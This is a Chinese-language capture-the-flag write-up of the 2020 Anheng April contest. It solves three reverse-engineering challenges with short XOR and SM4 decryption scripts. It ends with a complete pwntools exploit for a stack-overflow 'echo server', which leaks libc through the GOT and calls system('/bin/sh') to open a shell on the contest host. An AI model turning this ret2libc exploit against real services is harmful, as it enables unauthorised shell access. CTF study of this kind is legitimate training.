0x02 - 2020安恒4月月赛记录
-
-
Re简单是真滴简单,难是真滴难
-
做一半睡着了
Re - 入门reverse
- 白给的题目,flag贴脸上
str1 = "akhb~chdaZrdaZudqduvdZvvv|" flag = '' for i in str1: flag += chr((ord(i) - 1) ^ 6) print flag
- flag{daef_wef_reverse_sss}
Re - encrypt3
- 比较懒,没进行认真的分析,直接爆破出flag了
enc1 = [38, 44, 33, 39, 59, 35, 34, 115, 117, 114, 113, 33, 36, 117, 118, 119, 35, 120, 38, 114, 117, 113, 38, 34, 113, 114, 117, 114, 36, 112, 115, 118, 121, 112, 35, 37, 121, 61] for i in range(128): flag = '' for j in enc1: flag += chr(j ^ i) if 'flag{' in flag: print flag
- flag{cb3521ad567c8f251fb1252d03690ce9}
Re - sm
-
虽然知道是 sm 加密,猜测是 sm4,但是找了半天工具没找到
- 然后就<del>睡着了</del>干别的去了
-
结束后看一个师傅写有解密用的轮子
-
通过程序猜测出 key 为 0x0123456789ABCDEFFEDCBA9876543210
- 密文为 0xC079776677E5AC9931C567EB470645A7
-
装完轮子尝试解密出 flag
import pysm4 key = 0x0123456789ABCDEFFEDCBA9876543210 cipher = 0xC079776677E5AC9931C567EB470645A7 dec = pysm4.decrypt(cipher, key) print hex(dec)[2:-1]
- flag{d0389046c236e4c66bd787959f5c6e66}
Pwn - echo server
- 简单栈溢出,需要注意的就是要把栈指针劫持到 bss 段
from pwn import * from LibcSearcher import LibcSearcher #io = process('./test') io = remote('183.129.189.60', 10061) elf = ELF('./test') buf_len = 0x80 fakeebp = p64(elf.bss() + 0x500) start_addr = 0x00000000004005C0 pop_rdi_addr = 0x0000000000400823 retn_addr = 0x0000000000400824 payload = '\0' * buf_len + fakeebp + p64(pop_rdi_addr) + \ p64(elf.got['printf']) + p64(0x4006EE) + p64(start_addr) io.sendline('2333') io.sendline(payload) io.recvuntil('hello ') printf_libc_addr = u64(io.recv().ljust(8, '\x00')) libc = LibcSearcher('printf', printf_libc_addr) system_libc_addr = printf_libc_addr - libc.dump('printf') + libc.dump('system') bin_sh_libc_addr = printf_libc_addr - libc.dump('printf') + libc.dump('str_bin_sh') payload = '\0' * buf_len + fakeebp + p64(retn_addr) + p64(pop_rdi_addr) + p64( bin_sh_libc_addr) + p64(system_libc_addr) + p64(start_addr) io.sendline('2333') io.sendline(payload) io.interactive()